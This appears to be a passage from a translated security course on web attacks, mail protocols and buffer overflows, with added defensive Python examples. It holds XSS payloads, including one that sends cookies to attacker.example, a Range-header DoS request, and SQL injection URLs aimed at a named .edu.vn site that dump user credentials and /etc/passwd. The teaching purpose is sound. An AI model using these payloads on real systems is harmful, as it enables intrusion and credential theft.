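    for spec in m.group(1).split(","):
        spec = spec.strip()
        if "-" not in spec:
            return None
        first, last = spec.split("-", 1)
        try:
            ranges.append((int(first) if first else None, int(last) if last else None))
        except ValueError:
            return None
    return ranges


def overlapping(ranges) -> int:
    """Count ranges that overlap an earlier one (open-ended and suffix ranges count as whole-file)."""
    seen = []
    hits = 0
    for first, last in ranges:
        lo = first if first is not None else 0
        hi = last if (last is not None and first is not None) else float("inf")
        if any(lo <= h and l <= hi for l, h in seen):
            hits += 1
        seen.append((lo, hi))
    return hits


def is_range_abuse(value: str, max_ranges: int = 5) -> bool:
    """Flag a Range header the way the 2011 workaround did: too many ranges, or overlapping ones."""
    ranges = parse_ranges(value)
    if ranges is None:
        return False
    return len(ranges) > max_ranges or overlapping(ranges) > 0


def range_header(request: str):
    """Pull the Range header value out of a raw HTTP request (first occurrence only)."""
    for line in request.split("\r\n"):
        if line.lower().startswith("range:"):
            return line.split(":", 1)[1].strip()
    return None


# Constructed requests: a normal resumed download and an attack in the exploit's style.
NORMAL_REQUEST = "GET /big.iso HTTP/1.1\r\nHost: www.example.com\r\nRange: bytes=1048576-\r\n\r\n"
ATTACK_REQUEST = ("HEAD / HTTP/1.1\r\nHost: www.example.com\r\nRange: bytes=0-,"
                  + ",".join(f"5-{i}" for i in range(1300))
                  + "\r\nAccept-Encoding: gzip\r\n\r\n")


def scan(requests):
    """Return the indexes of requests whose Range header looks like the DoS."""
    flagged = []
    for i, req in enumerate(requests):
        value = range_header(req)
        if value is not None and is_range_abuse(value):
            flagged.append(i)
    return flagged


if __name__ == "__main__":
    print("flagged:", scan([NORMAL_REQUEST, ATTACK_REQUEST]))
```

A legitimate client resuming a download sends one range, and a PDF viewer fetching a few pages sends a handful of non-overlapping ones, so the two tests together stay quiet on normal traffic while catching the exploit's pattern of many overlapping ranges.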

f. Exploiting vulnerabilities in the web application
Web applications normally use input from the HTTP request (or from files) to decide what response to return. An attacker can modify any part of an HTTP request, including the URL, query string, headers, cookies, form fields and even hidden fields, to get past security checks. Common attacks of this kind include:
- executing arbitrary system commands
- cross-site scripting
- buffer overflows
- format string attacks
- SQL injection
- cookie poisoning
- tampering with hidden fields
In this exercise we try out cross-site scripting, format string, cookie manipulation and authorization failure.
Cross-site scripting
First log in with username jv and password jv789 and choose the "post message" function. Then post a script as the message text.
Submit the post. Press F5 to refresh the browser and the script's output appears.
At this point the victim's browser unwittingly runs the script that the user posted to the server. With such a script an attacker can steal the victim's cookie and log in to the system as the victim.
Strings for testing XSS:
"><script>alert('hey')</script>
http://ha.ckers.org/xss.html (XSS cheat sheet)
"><script>exec(%systemroot%\system32\cmd.exe)</script> (not valid JavaScript; a browser executes nothing here)
"><script>while(1){alert('hey')}</script> (endless loop)
"><script>alert(document.cookie)</script>
which displays, for example:
LeapLastLogin=20090523152133;
PHPSESSID=28026127959bf076767f3adac1c736d5
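The stored XSS above succeeds because the message is written into the page exactly as posted. The added example below (not code from the original exercise or from the vulnerable application) models the message board in a few lines: the unsafe renderer reproduces the stored payload, the safe one encodes it on output, and a check shows whether an active <script> tag survives. The payload that exfiltrates document.cookie is constructed for the example and uses an assumed attacker host.

```python
import html
import re

# In-memory message board, constructed for the example.
messages = []


def post_message(user: str, text: str) -> None:
    messages.append((user, text))


def render_unsafe() -> str:
    """Stored XSS: the message text is inserted into the HTML verbatim."""
    return "\n".join(f"<p><b>{u}</b>: {t}</p>" for u, t in messages)


def render_safe() -> str:
    """Output encoding: every untrusted value is HTML-escaped at the point of insertion."""
    return "\n".join(f"<p><b>{html.escape(u)}</b>: {html.escape(t, quote=True)}</p>"
                     for u, t in messages)


ACTIVE_SCRIPT = re.compile(r"<script\b", re.IGNORECASE)


def contains_active_script(rendered: str) -> bool:
    """True if the rendered page still contains a real <script> tag (not an escaped one)."""
    return ACTIVE_SCRIPT.search(rendered) is not None


# Payloads: the cookie probe from the page and a cookie-stealing variant (assumed attacker host).
PROBE = "\"><script>alert(document.cookie)</script>"
STEAL = ("<script>new Image().src='http://attacker.example/c?'"
         "+encodeURIComponent(document.cookie)</script>")


def demo() -> dict:
    """Post a harmless message and both payloads, then render the board both ways."""
    messages.clear()
    post_message("jv", "hello board")
    post_message("jv", PROBE)
    post_message("mallory", STEAL)
    return {"unsafe": contains_active_script(render_unsafe()),
            "safe": contains_active_script(render_safe())}


if __name__ == "__main__":
    print(demo())
    print(render_safe())
```

Escaping on output is the fix the board needs; marking the session cookie HttpOnly additionally keeps document.cookie from exposing PHPSESSID to any script that does manage to run.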
Introduction to SQL injection
This attack technique exploits applications that do not validate the characters a user supplies. Extra SQL is inserted into statements or queries (through text boxes, for example) before the web application passes them to the server; the server executes them and returns the result (query output or error messages) to the browser, from which the attacker can harvest data, run commands (in some cases) and eventually take control of the system. Some basic tricks follow.
Example: exploiting a SQL injection vulnerability in MySQL and PHP
http://tocbatdat.edu.vn/?show=news&ic=3&list=8_148&lg=1
Check whether the site is vulnerable.
Find the number of columns: 1 order by 30 (lower the number until the error disappears)
Find which column is displayed: 1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
The displayed column turns out to be 4, so the next step is:
Exploit
Step 1: list tables
1 and 1=0 union select 1,database(),3,group_concat(unhex(hex(table_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from information_schema.tables-- &catid=20
Step 2: list columns (group_concat(unhex(hex(column_name))))
http://www.tocbatdat.edu.vn/index.php?lg=1 and 1=0 union select 1,database(),3,group_concat(unhex(hex(column_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from information_schema.columns where table_name=char(106,111,115,95,117,115,101,114,115)-- &catid=20
(char(106,111,115,95,117,115,101,114,115) spells 'jos_users' without using quotes)
Step 3: dump the data
http://www.tocbatdat.edu.vn/index.php?lg=1 and 1=0 union select 1,database(),3,group_concat(username,0x2f,password,0x2f,email,userType),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from jos_users-- &catid=20
Step 4: read a system file
http://www.tocbatdat.edu.vn/index.php?lg=1 and 1=0 union select 1,database(),3,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- &catid=20
(the char() sequence spells /etc/passwd; load_file only works if the database account has the FILE privilege)
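The steps above depend on the application gluing the id parameter into its SQL string. The added example below (not from the original exercise; it uses SQLite in memory rather than the site's MySQL, and a constructed jos_users table with a made-up password hash) reproduces the two techniques at small scale: counting columns with ORDER BY until the database errors, and a UNION SELECT that pulls credentials through the vulnerable query. The parameterised version of the same query is shown beside it and is unaffected by the payload.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed schema: a news table the page queries and the Joomla users table it targets."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE jos_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, email TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'First post');
        INSERT INTO jos_users VALUES (62, 'admin', 'deadbeef:c0ffee', 'admin@example.com');
    """)
    return conn


def get_news_vulnerable(conn, news_id: str):
    """String concatenation: whatever the client sends becomes part of the SQL."""
    sql = "SELECT title, body FROM news WHERE id=" + news_id
    return conn.execute(sql).fetchall()


def get_news_safe(conn, news_id: str):
    """Parameterised query: the value can never change the statement's structure."""
    return conn.execute("SELECT title, body FROM news WHERE id=?", (news_id,)).fetchall()


def count_columns(conn, query, limit: int = 30) -> int:
    """The 'order by N' trick: the largest N that does not raise an error is the column count."""
    n = 0
    for i in range(1, limit + 1):
        try:
            query(conn, f"1 order by {i}")
            n = i
        except sqlite3.OperationalError:
            break
    return n


# Payload in the style of the page's step 3; the column count (2) comes from count_columns.
PAYLOAD = "1 and 1=0 union select username, password from jos_users--"


def demo() -> dict:
    """Run the column count and the UNION payload against both versions of the query."""
    conn = setup_db()
    return {
        "columns": count_columns(conn, get_news_vulnerable),
        "vulnerable": get_news_vulnerable(conn, PAYLOAD),
        "safe": get_news_safe(conn, PAYLOAD),
    }


if __name__ == "__main__":
    print(demo())
```

The "and 1=0" in the payload empties the legitimate result set so that only the injected SELECT's rows come back, which is why the page's steps all start that way.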
Another example against a site with a different schema (table maxcare_tbadmin with columns TenDN and MatKhau):
http://tocbatdat.edu.vn/?show=news&ic=3&list=8_148&lg=1%20and%201=0%20union%20select%201,2,3,4,group_concat%28TenDN,0x2f,MatKhau%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20maxcare_tbadmin--
3. Securing the mail server
a. Overview of SMTP, POP and IMAP
a.1 Architecture and operation of electronic mail
To send e-mail, the sender must have an account on a mail server. A mail server can hold one or many accounts, each with a distinct name (user), and each account has its own mailbox; the mailbox name is usually the same as the account name. The computer must also be connected, directly or indirectly, to the Internet in order to send and receive e-mail worldwide. A home user can still send and receive e-mail by connecting their computer to another computer over a modem. Some providers, such as hotmail.com or yahoo.com, issue free e-mail accounts to home computers that dial in over a modem to a dedicated mail machine; many commercial organisations also provide the service, or accounts, to home users for a monthly fee.
The path of a message
E-mail travels from one mail server to another across the Internet. When a message reaches its destination it is stored in the recipient's mailbox on that mail server until the recipient collects it. The whole process takes only a few minutes, which allows rapid communication with people anywhere in the world at any time of day or night.
Sending, receiving and transferring mail
To receive e-mail you need an e-mail account, that is, an address at which mail is delivered. One advantage over ordinary mail is that you can collect e-mail from anywhere: you simply connect to the mail server and download the messages to your computer. To send mail you need an Internet connection and access to a mail server that forwards the message. The standard protocol used to send mail is SMTP (Simple Mail Transfer Protocol); it is combined with POP (Post Office Protocol) or IMAP for retrieving mail.
Model of a mail server system:

For a mail server system serving a small or medium-sized organisation, the whole system is usually integrated on a single server, which receives and sends mail, stores the mailboxes and controls incoming and outgoing mail.
- SMTP is used to transfer mail between mail servers.
- SMTP is used to let mail clients submit mail to the server.
- POP or IMAP is used by mail clients to retrieve mail.
a.2 Introduction to the SMTP protocol
Introduction
The objective of SMTP is to transfer mail reliably and efficiently. SMTP is independent of the underlying transport subsystem and requires only a reliable data channel. An important feature of SMTP is its ability to relay mail across transport-service environments. A transport service provides an interprocess communication environment (IPCE). An IPCE may cover one network, several networks, or a subnet of a network; it can be understood as an environment in which one process can communicate directly with another. Importantly, IPCEs are not one-to-one with networks: a process can communicate directly with several other processes through an IPCE. Mail is an application of interprocess communication. Mail can be carried between processes on different IPCEs by a process that is connected to two (or more) IPCEs. More specifically, mail can be relayed across several hosts on different transport systems via intermediate hosts.
The SMTP model
SMTP is designed around the following communication model:
- When a user makes a mail request, the SMTP sender establishes a two-way transmission channel to the SMTP receiver.
- The SMTP receiver may be the final destination or only an intermediate.
- The SMTP sender sends SMTP commands to the SMTP receiver.
- The SMTP receiver responds to each command by returning the corresponding SMTP reply to the sender.
Once the transmission channel is established, the SMTP sender sends a MAIL command identifying the sender of the mail. If the SMTP receiver can accept mail it replies OK. The SMTP sender then sends a RCPT command identifying a recipient; if the receiver can accept mail for that recipient it replies OK, otherwise it replies that the mail is rejected. If the receiver replied OK, the SMTP sender sends the mail data, terminated by a special sequence. If the SMTP receiver successfully processes the mail data it replies OK.
- SMTP provides several different ways of sending mail:
  o Directly, when the sending host and the receiving host are connected to the same transport service.
  o Through SMTP servers, when the sending host and the receiving host are not connected to the same transport service.
The argument of the MAIL command is a reverse-path, which specifies who the mail is from. The argument of the RCPT command is a forward-path, which specifies who the mail is to. The forward-path is a source route, whereas the reverse-path is a return route (which can be used to return a notification to the sender when an error occurs with a relayed message).
When the same message is sent to several recipients, SMTP encourages transmitting only one copy of the data for all the recipients at the same destination host.
The mail commands and replies have a rigid syntax. Replies also carry a numeric code. In the following section, examples appear of actual use of the mail commands and replies, along with complete lists of the commands and replies.
Commands and replies are not case sensitive; that is, a command or reply word may be upper case, lower case, or any mixture of the two. Note that this is not true of mailbox user names: for some hosts user names are case sensitive, and SMTP implementations must take care to preserve the case of user names as they appear in mailbox arguments. Host names are not case sensitive. Commands and replies are composed of ASCII characters. When the transport service provides an 8-bit byte (octet) channel, each 7-bit character is placed in the low-order bits of the octet and the high-order bit is cleared to zero.
When specifying the general form of a command or reply, an argument is denoted by a metalinguistic variable (or constant), for example <string> or <reverse-path>; the angle brackets indicate a metalinguistic variable.
MIME and SMTP
MIME (Multipurpose Internet Mail Extensions) adds capabilities to SMTP by allowing files in multimedia encodings to accompany a standard SMTP message. MIME uses the Base64 encoding to convert complex file formats into ASCII for transfer. MIME is a new standard, but it is already supported by most applications, and you should switch if your e-mail program does not support MIME. MIME is specified in RFC 2045-2049.
S/MIME
S/MIME is a newer standard than MIME that supports encrypted messages. S/MIME is based on RSA public-key cryptography and protects messages from being read or intercepted.
SMTP commands
Put simply, SMTP uses short commands to control a message. The table below lists the SMTP commands, which are defined in RFC 821.

HELO    Hello. Identifies the sender of the mail. The command is accompanied by the name of the sending host. In ESMTP (the extended protocol) this command becomes EHLO.
MAIL    Initiates a mail transaction. Combined with "from" to identify the sender of the message.
RCPT    Identifies the recipient of the message.
DATA    Announces the start of the actual content of the message (the body). The data is encoded as 128-bit ASCII and is terminated by a line containing only a period (.).
RSET    Aborts the mail transaction.
VRFY    Verifies a recipient.
NOOP    "No operation": performs no action.
QUIT    Ends the session.
SEND    Tells the receiving host that the mail is to be delivered to another terminal.

Extended SMTP
SMTP has been improved continuously to meet users' growing demands and has become an increasingly useful protocol. Even so, the SMTP standard needed extending, and RFC 1869 was issued to supplement it. It not only extends SMTP but also adds needed features to the existing commands. For example, the SIZE extension lets the receiver limit the size of incoming messages; without ESMTP the size of a message cannot be limited. When a system connects to an MTA, it starts an ESMTP session by using EHLO instead of HELO. If the MTA supports extended SMTP (ESMTP) it replies with the list of extensions it supports; if not, it replies with an error code (500 Command not recognized) and the sending host falls back to plain SMTP. Here is an ESMTP session:
220 esmtpdomain.com Server ESMTP Sendmail 8.8.8+Sun/8.8.8; Thu, 22 Jul 1999 09:43:01
EHLO host.sendingdomain.com
250-mail.esmtpdomain.com Hello host, pleased to meet you
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ONEX
250-ETRN
250-XUSR
250 HELP QUIT
221 Goodbye host.sendingdomain.com
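An added example, not from the original document, that puts the SMTP model, the command table and the ESMTP session above into code: a minimal receiver state machine that enforces the HELO/EHLO, MAIL, RCPT, DATA order, answers with numeric replies, advertises extensions on EHLO and refuses to relay for foreign domains, driven by a scripted sender so both sides of the exchange are visible. The local-domain policy, the extension list and the session lines are constructed for the example.

```python
import re

# Constructed policy for this example (not a real server's configuration): the domain
# we accept mail for, and the extensions advertised in reply to EHLO.
LOCAL_DOMAINS = {"esmtpdomain.com"}
EXTENSIONS = ["8BITMIME", "SIZE 10485760"]

class SmtpReceiver:
    """Receiver side of the model above: enforces HELO/EHLO -> MAIL -> RCPT -> DATA
    and answers every command with a numeric reply."""

    def __init__(self):
        self.greeted = False
        self.in_data = False
        self.delivered = []        # (reverse-path, forward-paths, body) accepted with 250
        self._reset()

    def _reset(self):
        self.sender, self.recipients, self.body = None, [], []

    def handle(self, line):
        """Return the list of reply lines for one line sent by the SMTP sender."""
        if self.in_data:
            return self._data_line(line)
        verb, _, arg = line.partition(" ")
        verb = verb.upper()                    # commands are not case sensitive
        if verb in ("HELO", "EHLO"):
            self.greeted = True
            self._reset()
            if verb == "EHLO":                 # ESMTP: list the supported extensions
                return ["250-mail.esmtpdomain.com Hello"] + [f"250-{e}" for e in EXTENSIONS] + ["250 HELP"]
            return ["250 mail.esmtpdomain.com Hello"]
        if verb == "MAIL":
            if not self.greeted:
                return ["503 Bad sequence of commands"]
            m = re.fullmatch(r"FROM:<([^>]*)>", arg, re.I)
            if not m:
                return ["501 Syntax error in parameters"]
            self._reset()
            self.sender = m.group(1)           # the reverse-path
            return ["250 OK"]
        if verb == "RCPT":
            if self.sender is None:
                return ["503 Need MAIL command first"]
            m = re.fullmatch(r"TO:<([^>]+@([^>]+))>", arg, re.I)
            if not m:
                return ["501 Syntax error in parameters"]
            if m.group(2).lower() not in LOCAL_DOMAINS:
                return ["550 Relaying denied"]  # do not act as an open relay
            self.recipients.append(m.group(1)) # the forward-path
            return ["250 OK"]
        if verb == "DATA":
            if not self.recipients:
                return ["503 Need RCPT command first"]
            self.in_data = True
            return ["354 Start mail input; end with <CRLF>.<CRLF>"]
        if verb == "RSET":
            self._reset()
            return ["250 OK"]
        if verb == "QUIT":
            return ["221 Goodbye"]
        return ["500 Command not recognized"]

    def _data_line(self, line):
        if line == ".":                        # a line holding only a period ends the body
            self.in_data = False
            self.delivered.append((self.sender, list(self.recipients), "\n".join(self.body)))
            self._reset()
            return ["250 OK: queued"]
        if line.startswith(".."):              # undo the sender's dot-stuffing
            line = line[1:]
        self.body.append(line)
        return []

def run_session(client_lines):
    """Feed the sender's lines to a receiver; return the receiver and the two-sided transcript."""
    rx = SmtpReceiver()
    transcript = ["S: 220 mail.esmtpdomain.com ESMTP"]
    for line in client_lines:
        transcript.append("C: " + line)
        transcript.extend("S: " + reply for reply in rx.handle(line))
    return rx, transcript

# Constructed exchange: one relay attempt (refused with 550), then a local delivery.
SESSION = ["EHLO host.sendingdomain.com", "MAIL FROM:<alice@sendingdomain.com>",
           "RCPT TO:<bob@otherdomain.com>", "RCPT TO:<bob@esmtpdomain.com>", "DATA",
           "Subject: Hello", "", "..a line that starts with a dot", ".", "QUIT"]

if __name__ == "__main__":
    print("\n".join(run_session(SESSION)[1]))
```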

SMTP headers
A great deal of useful information can be obtained by examining the headers of a message. Not only can you see where the message came from, its subject, the date sent and the recipients; you can also see the points the message passed through before it reached your mailbox. RFC 822 specifies what the header contains: at minimum the sender (From), the date sent and the recipients (To, Cc or Bcc).
The headers of a received message let you see where the message passed through before reaching your mailbox. They are a very good tool for checking and troubleshooting. Here is an example:
From someone@mydomain.COM Sat Jul 31 11:33:00 1999
Received: from host1.mydomain.com by host2.mydomain.com (8.8.8+Sun/8.8.8)
    with ESMTP id LAA21968 for ; Sat, 31 Jul 1999 11:33:00 -0400 (EDT)
Received: by host1.mydomain.com with Internet Mail Service (5.0.1460.8)
    id ; Sat, 31 Jul 1999 11:34:39 -0400
Message-ID:
From: "Your Friend"
To: "'jamisonn@host2.mydomain.com'"
Subject: Hello There
Date: Sat, 31 Jul 1999 11:34:36 -0400
In the example above you can see that the message was sent from someone@mydomain.com. From mydomain.com it was passed to host1. The message was sent from host2 to host1 and delivered to the user. At every place the message stops, the receiving host is required to add information to the header, including the date and time of the stop. Host2 reports receiving the message at 11:33:00, while host1 reports receiving it at 11:34:36; the discrepancy of more than a minute is probably due to the clocks of the two hosts not being synchronised.
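The Received-chain analysis the text describes, as an added example that is not part of the original document: it parses the hops in chronological order, computes the time between them and flags the backwards jump between host1 and host2. The message below reuses the hosts and timestamps of the example above; the addresses the page elides are filled with placeholder values, and the skew threshold is an assumption for this example.

```python
from email import message_from_string
from email.utils import parsedate_to_datetime

# Constructed message reusing the hosts and timestamps of the example above; the
# addresses and ids are placeholders, not values from the original headers.
SAMPLE_MESSAGE = """\
Received: from host1.mydomain.com by host2.mydomain.com (8.8.8+Sun/8.8.8)
\twith ESMTP id LAA21968 for <jamisonn@host2.mydomain.com>;
\tSat, 31 Jul 1999 11:33:00 -0400 (EDT)
Received: by host1.mydomain.com with Internet Mail Service (5.0.1460.8)
\tid <PLACEHOLDER-ID@host1.mydomain.com>; Sat, 31 Jul 1999 11:34:39 -0400
Message-ID: <PLACEHOLDER-ID@host1.mydomain.com>
From: "Your Friend" <someone@mydomain.com>
To: "'jamisonn@host2.mydomain.com'" <jamisonn@host2.mydomain.com>
Subject: Hello There
Date: Sat, 31 Jul 1999 11:34:36 -0400

Hello there.
"""

def parse_hops(raw_message):
    """Return the Received hops in chronological order (oldest first).

    Each host prepends its own Received header, so the topmost header is the most
    recent hop; the timestamp is the part of the header after the last ';'."""
    msg = message_from_string(raw_message)
    hops = []
    for value in msg.get_all("Received", []):
        text = " ".join(value.split())          # unfold continuation lines
        clause, _, stamp = text.rpartition(";")
        words = clause.split()
        by_host = words[words.index("by") + 1] if "by" in words else None
        hops.append({"by": by_host, "time": parsedate_to_datetime(stamp.strip())})
    hops.reverse()
    return hops

def hop_delays(hops):
    """Seconds between consecutive hops. A negative value means a later host stamped an
    earlier time than the previous one, which is what the clock remark above describes."""
    return [int((b["time"] - a["time"]).total_seconds()) for a, b in zip(hops, hops[1:])]

def suspicious_hops(hops, max_skew=60):
    """Hosts whose timestamp goes backwards by more than max_skew seconds: either the
    clocks are unsynchronised or the Received chain has been tampered with."""
    return [hops[i + 1]["by"] for i, d in enumerate(hop_delays(hops)) if d < -max_skew]

if __name__ == "__main__":
    hops = parse_hops(SAMPLE_MESSAGE)
    for h in hops:
        print(f"{h['time'].isoformat()}  received by {h['by']}")
    print("delays:", hop_delays(hops), "suspicious:", suspicious_hops(hops))
```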
Advantages and disadvantages of SMTP
Like X.400, SMTP has a number of advantages and disadvantages.
Advantages include:
- SMTP is very popular.
- It is supported by many organisations.
- SMTP is cheap to administer and maintain.
- SMTP has a simple address structure.
Disadvantages include:
- SMTP lacks some functionality.
- SMTP lacks the security capabilities of X.400.
- It is limited to the simplest features.
a.3 Introduction to the POP and IMAP protocols
In the early days of e-mail, users were required to log in to the mail server and read their messages there. Mail programs were text-based and not user friendly. To solve this, a number of protocols were developed that let users download mail to their own machines or use friendlier interfaces, and this is what brought about the popularity of e-mail. The two most widely used protocols today are POP (Post Office Protocol) and IMAP (Internet Mail Access Protocol).
Post Office Protocol (POP)
POP lets a user with an account on the mail server connect to the MTA and download mail to their own computer, where it can be read and replied to. POP was first developed in 1984 and was upgraded from POP2 to POP3 in 1988; today almost all users use the POP3 standard.
POP3 connects over TCP/IP to the mail server (using port 110). The user enters a username and password. After authentication, the client uses POP3 commands to retrieve or delete mail.
POP3 is only a protocol for retrieving mail from the mail server. POP3 is specified in RFC 1939.
POP3 commands
Command   Description
USER      Specifies the username
PASS      Specifies the password
STAT      Requests the status of the mailbox, such as the number of messages and their size
LIST      Lists the messages
RETR      Retrieves a message
DELE      Deletes the specified message
NOOP      Does nothing
RSET      Restores the deleted messages (rollback)
QUIT      Applies the changes and exits

Internet Mail Access Protocol (IMAP)
POP3 is a very useful and very simple protocol for retrieving a user's mail, but its simplicity also means it lacks some necessary features. For example, POP3 works only in offline mode, meaning that mail is downloaded and then deleted from the server. IMAP makes up for the shortcomings of POP3. IMAP was developed in 1986 at Stanford University; IMAP2 followed in 1987. IMAP4, the latest version in use, was accepted by the Internet standards bodies in 1994. IMAP4 is specified in RFC 2060 and uses TCP port 143.
IMAP4 commands
Command       Description
CAPABILITY    Requests the list of supported capabilities
AUTHENTICATE  Specifies the use of authentication from another server
LOGIN         Provides the username and password
SELECT        Selects a mailbox
EXAMINE       Opens a mailbox read-only
CREATE        Creates a mailbox
DELETE        Deletes a mailbox
RENAME        Renames a mailbox
SUBSCRIBE     Adds a mailbox to the active list
UNSUBSCRIBE   Removes a mailbox from the active list
LIST          Lists the mailboxes
LSUB          Shows the user's mailbox list
STATUS        Status of a mailbox (number of messages, ...)
APPEND        Adds a message to a mailbox
CHECK         Requests a check of the mailbox
CLOSE         Performs the deletions and leaves the mailbox
EXPUNGE       Performs the deletions
SEARCH        Searches the mailbox for the specified messages
FETCH         Retrieves from the content of a message
STORE         Changes the content of messages
COPY          Copies a message to another mailbox
NOOP          Does nothing
LOGOUT        Closes the connection

Comparison of POP3 and IMAP4
There are many differences between POP3 and IMAP4. Depending on the users, the MTA and the requirements, you can use POP3, IMAP4 or both.
The benefits of POP3 are:
- It is very simple.
- It is very widely supported.
Because it is so simple, POP3 has many limitations; for example, it supports only one mailbox, and mail is deleted from the mail server when it is downloaded.
IMAP4 has other benefits:
- Strong authentication support.
- Support for multiple mailboxes.
- In particular, support for the online, offline and disconnected modes of working. In online mode IMAP4 supports retrieving a set of messages from the server, searching and fetching only the wanted message, and so on. IMAP4 also lets users move messages from one folder to another on the server, or delete them. IMAP4 is well suited to users who travel and have to work from different computers.
b. Risks of attack when using e-mail
b.1 Lack of security in the e-mail system
Webmail: if the connection to the webmail server is not secure (for example the address is http:// rather than https://), then all information, including the username and password, is sent unencrypted between the webmail server and your computer.
SMTP: SMTP does not encrypt messages. Every connection between SMTP servers carries your message in the clear for any eavesdropper to see. In addition, if the e-mail server requires you to send a username and password to log in to the SMTP server in order to relay a message to another server, these too are sent in the clear and are a target for eavesdropping. Finally, messages sent with SMTP include information about the computer they were sent from and the e-mail program used. This information is available to every recipient and may be of a private nature.
POP and IMAP: the POP and IMAP protocols require you to send a username and password to log in, and neither is encrypted. Your messages can therefore be read by anyone eavesdropping on your computer's traffic or on your e-mail provider.
Backups: messages are stored on the SMTP server in the clear, unencrypted. Backups of the server's data may be taken at any time, and the administrator can read any data on the machine.
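An added example (not from the original document) of the detection side of b.1: a passive check over captured client lines that flags POP3, IMAP and SMTP sessions in which a password-bearing command was sent before STARTTLS or STLS, reporting the command without re-leaking the secret. The session lines, ports and credentials are constructed for the example.

```python
# Constructed samples: client lines from five mail sessions as a network monitor would
# see them, tagged with the destination port (not a real capture; credentials are fake).
SESSIONS = {
    "pop3-plain": (110, ["USER alice", "PASS s3cret", "STAT", "QUIT"]),
    "imap-plain": (143, ["a1 CAPABILITY", 'a2 LOGIN "bob" "hunter2"', "a3 SELECT INBOX"]),
    "imap-tls":   (143, ["a1 STARTTLS"]),           # after STARTTLS the rest is encrypted
    "smtp-plain": (25,  ["EHLO laptop", "AUTH PLAIN AGFsaWNlAHMzY3JldA==", "MAIL FROM:<a@b>"]),
    "pop3-apop":  (110, ["APOP alice c4c9334bac560ecc979e58001b3e22fb", "QUIT"]),
}

# Commands that carry a secret in the clear unless TLS was negotiated first.
CLEARTEXT_AUTH = {
    110: ("PASS",),                  # POP3 USER/PASS; APOP sends a digest, not the password
    143: ("LOGIN", "AUTHENTICATE PLAIN", "AUTHENTICATE LOGIN"),
    25:  ("AUTH PLAIN", "AUTH LOGIN"),
    587: ("AUTH PLAIN", "AUTH LOGIN"),
}

def strip_imap_tag(line):
    # IMAP prefixes each client command with a tag ("a2 LOGIN ..."); drop it.
    parts = line.split(" ", 1)
    return parts[1] if len(parts) == 2 else line

def cleartext_credentials(port, client_lines):
    """Return the credential-bearing commands sent before any STARTTLS/STLS on this
    session, with the secret replaced by a marker so the alert does not re-leak it."""
    findings = []
    for raw in client_lines:
        line = strip_imap_tag(raw) if port == 143 else raw
        upper = line.upper()
        if upper.startswith("STARTTLS") or upper.startswith("STLS"):
            break                     # everything after this is inside TLS
        for prefix in CLEARTEXT_AUTH.get(port, ()):
            if upper.startswith(prefix):
                findings.append(prefix + " <redacted>")
    return findings

def audit(sessions):
    """Map each session name to the cleartext credential commands found in it."""
    return {name: cleartext_credentials(port, lines) for name, (port, lines) in sessions.items()}

if __name__ == "__main__":
    for name, found in audit(SESSIONS).items():
        print(f"{name:11s} {'CLEARTEXT AUTH' if found else 'ok':15s} {found}")
```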
b.2 Risks while sending e-mail
Eavesdropping:
The Internet is a vast place with a great many people. It is easy for someone with access to a computer or network segment that your information passes through to capture and read it. Just like someone in the next room listening in on your phone call, a hacker can use man-in-the-middle tools to capture all of an e-mail user's packets. This can be done easily with programs such as Cain&Abel, Ettercap and the like.

Countering eavesdropping:
- To prevent eavesdropping, we should encrypt information while it travels over the Internet to the mail server, and on the server itself the information should be encrypted and stored securely with a secret key that only the intended recipient knows.
Identity theft:
If someone can obtain the username and password you use to access the e-mail server, they can read your mail and send mail as you. Typically this information is collected by an eavesdropper on an SMTP, POP, IMAP or webmail connection, or by reading a message in which you included it.
Countering identity theft:
- To counter identity theft, we need to create a private, confidential and secure exchange by sending personal information and message content in encrypted form while it travels over the Internet.
Example: MyMail uses Secure Socket Protocol links to reduce identity theft.
Invasion of privacy:
If you care about your private information, you should consider the possibility that your backups are not protected.
You may also be concerned that other people can learn the IP address of your computer. This information can be used to identify the city you live in, or in some cases even to find your address. This does not happen with webmail, POP or IMAP, but it can with SMTP.
Countering invasion of privacy:
- All information is secured by encrypting it with a secret key before storing it; to read mail, the recipient must enter their exact username and password.
- Hide the IP address in the message header; this protects personal information such as the city and state you live in.
- Encrypt all stored e-mail content, and encrypt it in transit as well.
Message modification:
Anyone with admin rights on any SMTP server that your message passes through can not only read your message but also delete or alter it before it continues to its destination. Your recipient has no way of knowing whether your message was altered, and if the message is deleted they cannot know that a message was ever sent to them.
Countering message modification:
- When e-mail reaches the mail server it should be stored encrypted with a dedicated secret key, so that even someone with admin rights on the server cannot alter its content.
- Furthermore, we must also prevent the system administrator from gaining access to an e-mail account simply by resetting it and creating a new password.
4. Remote access security
This part is presented in section 2 of the Network Infrastructure Security document.
5. Buffer overflow vulnerabilities and how to prevent them
a. Theory
In computer security and programming, a buffer overflow is a programming error that can cause a memory access exception and terminate the program, or, in the hands of a malicious user, can be exploited to breach system security.
A buffer overflow is an anomalous condition in which a process stores data beyond the boundaries of a fixed-length buffer. The result is that the data overwrites adjacent memory locations.
The overwritten data may include other buffers, variables and program flow control data.
Buffer overflows can cause a process to crash or produce incorrect results. They can be triggered by specially crafted input designed to execute malicious code or make the program behave unexpectedly. In this way buffer overflows cause many software vulnerabilities and form the basis of many exploits. Adequate bounds checking by the programmer or the compiler can prevent buffer overflows.
b. Technical description
A buffer overflow occurs when data is written to a buffer without adequate bounds checking, so that it overwrites adjacent memory and corrupts the data values at the memory addresses next to the buffer. This happens most often when copying a string from one buffer to another.
c. Basic example
